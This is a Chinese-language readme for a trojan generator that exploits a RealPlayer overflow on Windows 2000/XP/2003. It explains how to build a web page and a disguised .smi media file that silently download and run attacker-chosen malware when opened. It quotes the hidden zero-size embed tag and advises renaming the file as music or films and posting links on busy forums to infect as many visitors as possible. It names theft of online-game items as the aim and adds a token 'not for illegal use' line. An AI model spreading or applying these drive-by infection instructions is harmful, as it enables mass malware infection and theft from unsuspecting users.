
realplay网马去后门增强版
木马利用realplay的漏洞而制作,设计面很广,挂马方便、容易。 目标主机: win2000,winxp,win2003 装有realoneplayer,realplayer,暴风影音的机器 中马方式:隐蔽,打开页面即可立即中。隐藏执行所挂木马。 您可让用户边听歌,边中木马。呵呵 如果你在访客众多的论坛上发个留言,那么,看了的人可都全中了。!!此工具适合做网游装备和挂马的朋友! 注意:此漏洞涉及面广,利用价值高,不得用于非法用途!!
木马生成器说明: 界面说明: 木马下载地址: 请指定您希望对方用户自动下载并运行的程序。 页面显示内容: 网页内欺骗内容,可随意编写。 结果说明: 生成后,本目录下将有两文件: music.htm music.smi [music.htm] 木马网页,核心部分是其中的: <embed type="audio/x-pn-realaudio-plugin" src="music.smi" height=0 width=0 autostart=true> 意思是在ie中嵌入music.smi媒体,并自动播放,高度height和宽度width都为0(隐藏起来),您也可以让它显示出来,自己随意定制。 [music.smi] 木马核心文件,.smi类型可保证默认是用realplay打开,从而提高命中率,一看即中,你也可以把此文件改名,例如: 好看电影.smi,好听音乐.smi,搞笑片段.smil等等,可直接让别人打开即中。
另,如果想在论坛一些地方放此溢出木马,直接把music.smi文件当成普通的mp3,rm文件一样发出去即可。 例如你的music.smi放在 http://www.a1234.com/haha/music.smi,你就可以把此链接放到想利用的论坛或者什么地方,即看即中。
ps:本溢出程序在中文win2000 sp0-sp4,winxp sp0-sp2,win2003 sp0-sp1下试验通过. 支持realoneplayer,realplayer10,暴风影音所有能完全支持real媒体的机器。 漏洞已经通报real公司,公司应该会出了补丁。但real软件不支持自动升级,98%的用户都不会去real网站上升级,所以利用率极大!
使用中,有问题可及时像我反馈,我收到后将给予回答。 BY:HackerSZC QQ:83883886 |